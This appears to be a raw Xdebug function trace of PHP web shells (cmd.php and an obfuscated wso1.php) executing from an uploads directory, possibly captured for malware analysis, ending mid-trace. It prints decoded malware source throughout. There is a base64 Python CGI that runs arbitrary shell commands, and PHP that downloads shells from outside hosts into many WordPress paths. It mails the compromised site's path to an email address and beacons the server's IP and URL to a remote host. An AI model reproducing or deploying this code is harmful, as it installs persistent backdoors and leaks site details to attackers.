\'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n' /var/www/html/uploads/cmd.php(4) : eval()'d code 1 0
4 13 0 0.007871 1143752 base64_decode 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 16 1 'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4 13 1 0.007902 1143840
4 13 R 'http://byr00t.co/l-'
4 14 0 0.007928 1143808 GetIP 1 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 16 0
5 15 0 0.007950 1143808 getenv 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 3 1 'HTTP_CLIENT_IP'
5 15 1 0.007975 1143840
5 15 R FALSE
5 16 0 0.007998 1143808 getenv 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 5 1 'HTTP_X_FORWARDED_FOR'
5 16 1 0.008023 1143840
5 16 R FALSE
5 17 0 0.008045 1143808 getenv 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 12 1 'REMOTE_ADDR'
5 17 1 0.008069 1143880
5 17 R '127.0.0.1'
4 A /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 12 $ip = '127.0.0.1'
4 14 1 0.008112 1143848
4 14 R '127.0.0.1'
4 18 0 0.008136 1143872 base64_encode 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 16 1 'http://localhost/uploads/cmd.php'
4 18 1 0.008158 1143984
4 18 R 'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
3 A /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 16 $x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
4 19 0 0.008208 1143864 function_exists 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 17 1 'curl_init'
4 19 1 0.008229 1143904
4 19 R TRUE
4 20 0 0.008251 1143864 curl_init 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 19 0
4 20 1 0.008283 1144776
4 20 R resource(3) of type (curl)
3 A /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 19 $ch = resource(3) of type (curl)
4 21 0 0.008326 1144776 curl_setopt 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 10002 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
4 21 1 0.008357 1144872
4 21 R TRUE
4 22 0 0.008378 1144776 curl_setopt 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 19 3 resource(3) of type (curl) 19913 TRUE
4 22 1 0.008401 1144872
4 22 R TRUE
4 23 0 0.008421 1144776 curl_exec 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 23 1 0.055755 1144808
4 23 R ''
3 A /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 19 $gitt = ''
4 24 0 0.055821 1144776 curl_close 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 19 1 resource(3) of type (curl)
4 24 1 0.055893 1143920
4 24 R NULL
4 25 0 0.055915 1143888 file_get_contents 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 21 1 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL2NtZC5waHA='
4 25 1 1.028402 1147584
4 25 R ''
3 A /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 21 $gitt = ''
3 A /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 26 $auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3 A /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 27 $color = '#00ff66'
3 A /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 28 $default_action = 'FilesMan'
4 26 0 1.028518 1147544 define 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 29 2 'SELF_PATH' '/var/www/html/uploads/cmd.php(4) : eval()\'d code(1) : eval()\'d code'
4 26 1 1.028566 1147648
4 26 R TRUE
4 27 0 1.028582 1147576 strpos 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 30 2 'python-requests/2.25.1' 'Google'
4 27 1 1.028624 1147648
4 27 R FALSE
4 28 0 1.028648 1147576 session_start 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 32 0
4 28 1 1.028717 1148328
4 28 R TRUE
4 29 0 1.028732 1148328 error_reporting 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 33 1 0
4 29 1 1.028746 1148368
4 29 R 0
4 30 0 1.028759 1148328 ini_set 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 34 2 'error_log' NULL
4 30 1 1.028775 1148400
4 30 R ''
4 31 0 1.028787 1148328 ini_set 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 35 2 'display_errors' 0
4 31 1 1.028802 1148400
4 31 R ''
4 32 0 1.028814 1148328 ini_set 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 36 2 'log_errors' 0
4 32 1 1.028828 1148400
4 32 R '1'
4 33 0 1.028840 1148328 ini_set 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 37 2 'max_execution_time' 0
4 33 1 1.028856 1148432
4 33 R '30'
4 34 0 1.028869 1148328 set_time_limit 0 /var/www/html/uploads/cmd.php(4) : eval()'d code(1) : eval()'d code 38 1 0
4 34 1 1.028883 1148392
4 34 R FALSE
3 12 1 1.028905 1149824
2 7 1 1.028922 1062800
1 3 1 1.028929 1061224
1 35 0 1.028937 1061256 Error->__toString 0 Unknown 0 0
2 36 0 1.028949 1061336 Error->getTraceAsString 0 Unknown 0 0
2 36 1 1.028961 1061592
2 36 R '#0 /var/www/html/uploads/cmd.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/cmd.php(4): eval()\n#2 {main}'
1 35 1 1.028981 1065728
1 35 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/cmd.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/cmd.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/cmd.php(4): eval()\n#2 {main}'
1.029034 986224
TRACE END [2023-02-12 22:46:00.695253]
data/traces/9d98853a714da34855a92cb5ba345601_trace-1676249253.5392.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:47:59.437057]
1 0 1 0.000132 393512
1 3 0 0.000359 426920 {main} 1 /var/www/html/uploads/wso1.php 0 0
1 A /var/www/html/uploads/wso1.php 2 $stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1 A /var/www/html/uploads/wso1.php 3 $stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2 4 0 0.000438 426920 base64_decode 0 /var/www/html/uploads/wso1.php 4 1 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2 4 1 0.000457 427080
2 4 R 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 0 0.000478 427048 gzinflate 0 /var/www/html/uploads/wso1.php 4 1 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 1 0.000500 427176
2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 0 0.000517 427016 htmlspecialchars_decode 0 /var/www/html/uploads/wso1.php 4 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 1 0.000534 427048
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 7 0 0.000561 428576 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' /var/www/html/uploads/wso1.php 4 0
3 8 0 0.000577 428576 strrev 0 /var/www/html/uploads/wso1.php(4) : eval()'d code 1 1 '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3 8 1 0.000630 461376
